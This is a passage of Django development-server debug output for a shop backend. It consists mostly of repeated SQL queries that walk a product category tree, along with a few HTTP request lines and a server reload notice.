ASC; args=(17,) DEBUG 2019-12-27 07:27:34,288 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:27:34,292 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:27:34,296 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:27:34,300 utils 31585 139762228295424 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:27:34] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [27/Dec/2019 07:27:34] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 304 0 [27/Dec/2019 07:27:34] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 304 0 DEBUG 2019-12-27 07:27:37,788 utils 31585 139762214569728 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:27:37,794 utils 31585 139762214569728 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:27:37,797 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:27:37,800 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:27:37,803 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:27:37,806 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:27:37,808 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:27:37,810 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:27:37,812 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:27:37,816 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:27:37,818 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:27:37,820 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:27:37,822 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:27:37,825 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-27 07:27:37,828 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-27 07:27:37,830 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-27 07:27:37,832 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-27 07:27:37,835 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-27 07:27:37,837 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-27 07:27:37,841 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-27 07:27:37,843 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-27 07:27:37,845 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-27 07:27:37,847 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-27 07:27:37,850 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-27 07:27:37,852 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-27 07:27:37,855 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-27 07:27:37,858 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-27 07:27:37,860 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-27 07:27:37,862 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-27 07:27:37,865 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-27 07:27:37,868 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-27 07:27:37,870 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-27 07:27:37,872 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-27 07:27:37,875 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-27 07:27:37,877 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-27 07:27:37,881 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-27 07:27:37,883 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-27 07:27:37,886 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-27 07:27:37,888 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-27 07:27:37,890 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-27 07:27:37,893 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-27 07:27:37,895 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-27 07:27:37,898 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-27 07:27:37,900 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-27 07:27:37,903 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-27 07:27:37,905 utils 31585 139762214569728 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [27/Dec/2019 07:27:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 /home/resfx/public_html/admin.resfx.com/backend/django_shop_tutorial/urls.py changed, reloading. Performing system checks... December 27, 2019 - 07:20:39 Django version 2.2.7, using settings 'django_shop_tutorial.settings' Starting development server at http://127.0.0.1:8000/ Quit the server with CONTROL-C. Watching for file changes with StatReloader System check identified some issues: WARNINGS: ?: (urls.W005) URL namespace 'admin' isn't unique. You may not be able to reverse all URLs in this namespace System check identified 1 issue (0 silenced). DEBUG 2019-12-27 07:27:53,947 utils 31843 140533182007040 (0.004) SELECT c.relname, CASE WHEN c.relispartition THEN 'p' WHEN c.relkind IN ('m', 'v') THEN 'v' ELSE 't' END FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN ('f', 'm', 'p', 'r', 'v') AND n.nspname NOT IN ('pg_catalog', 'pg_toast') AND pg_catalog.pg_table_is_visible(c.oid) ; args=None DEBUG 2019-12-27 07:27:53,951 utils 31843 140533182007040 (0.001) SELECT "django_migrations"."app", "django_migrations"."name" FROM "django_migrations"; args=() DEBUG 2019-12-27 07:28:02,834 utils 31843 140533074753280 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'api-token-auth'; args=('api-token-auth',) Not Found: /api-token-auth/ [27/Dec/2019 07:28:02] "GET /api-token-auth/ HTTP/1.0" 404 1747 DEBUG 2019-12-27 07:28:04,933 utils 31843 140533074753280 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-27 07:28:04,950 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-27 07:28:04,958 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-27 07:28:04,963 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-27 07:28:04,970 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-27 07:28:04,974 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-27 07:28:04,978 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-27 07:28:04,981 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-27 07:28:04,985 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-27 07:28:04,992 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-27 07:28:04,996 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-27 07:28:05,001 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-27 07:28:05,003 utils 31843 140533074753280 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-27 07:28:05,008 utils 31843 140533074753280 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", 